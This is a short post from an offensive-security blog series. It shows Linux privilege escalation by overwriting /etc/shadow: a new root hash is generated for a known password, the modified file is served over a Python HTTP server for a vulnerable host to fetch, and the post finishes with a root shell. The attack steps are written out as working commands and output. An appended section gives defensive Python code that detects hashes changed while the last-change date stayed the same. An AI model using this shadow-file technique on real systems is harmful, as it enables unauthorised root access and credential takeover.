Day 40: Privilege Escalation (Linux) by Modifying Shadow File for the Easy Win

Scenario

Original File

root:$6$RIgrVboA$HDaB29xvtkw6U/Mzq4qOHH2KHB1kIR0ezFyjL75DszasVFwznrsWcc1Tu5E2K4FA7/Nv8oje0c.bljjnn6FMF1:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

Generate a new Shadow Hash

root@kali:~/# mkpasswd -m sha-512 -S saltsalt -s
Password: pwned123
$6$saltsalt$HOC6AvLVkxCTYnJ5Tc78.CYF/KdcBDmheMbOGQTqiMUZhdKof7eXjN9/6I3w8smybsEQEaz5Vh8aoGGs71hf20

Modified File

root:$6$saltsalt$HOC6AvLVkxCTYnJ5Tc78.CYF/KdcBDmheMbOGQTqiMUZhdKof7eXjN9/6I3w8smybsEQEaz5Vh8aoGGs71hf20:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

Now Write the File via Vulnerability and Profit

root@kali:~/# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.10.150 - - [08/Feb/2019 03:27:11] "GET /shadow HTTP/1.1" 200

Easy Root

daisy@vulnerable:~/# su root
Password: pwned123
root@vulnerable:/# id
uid=0(root) gid=0(root) groups=0(root)
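
Detecting This Change

In the modified file above, the root hash is replaced but the third field (17673, the day of the last password change) is identical to the original. The following added example, which is not part of the original post, uses that mismatch as a detection check against a trusted baseline copy of the file; the function names and sample entries are constructed for illustration.

```python
from typing import Dict, List, Tuple

# Constructed sample data: placeholder hashes, not values from the page.
BASELINE = """\
root:$6$EXAMPLESALT$constructedHashA:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
daisy:$6$EXAMPLESALT$constructedHashB:17650:0:99999:7:::
"""
CURRENT = """\
root:$6$EXAMPLESALT$constructedHashX:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
daisy:$6$EXAMPLESALT$constructedHashC:17935:0:99999:7:::
"""


def parse_shadow(text: str) -> Dict[str, Tuple[str, str]]:
    """Map account name -> (password field, lastchg) from shadow(5) lines."""
    entries = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 3 or not fields[0]:
            continue  # skip blank or malformed lines
        entries[fields[0]] = (fields[1], fields[2])
    return entries


def find_out_of_band_changes(baseline: str, current: str) -> List[str]:
    """Flag accounts whose hash changed while lastchg (field 3) did not.

    Assumption: password changes made through passwd(1) update lastchg, so a
    new hash with an old lastchg points to a direct write to the file.
    """
    old, new = parse_shadow(baseline), parse_shadow(current)
    findings = []
    for name, (pw, lastchg) in new.items():
        if name not in old:
            findings.append(f"{name}: account not in baseline")
            continue
        old_pw, old_lastchg = old[name]
        if pw != old_pw and lastchg == old_lastchg:
            findings.append(f"{name}: hash changed but lastchg still {lastchg}")
    return findings


if __name__ == "__main__":
    for finding in find_out_of_band_changes(BASELINE, CURRENT):
        print(finding)
```

The lastchg field has one-day granularity, so a legitimate change made on the same day as the baseline is also flagged; treat a hit as a lead to confirm with file-integrity monitoring on /etc/shadow.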

Security Researcher / 365 Days of PWN
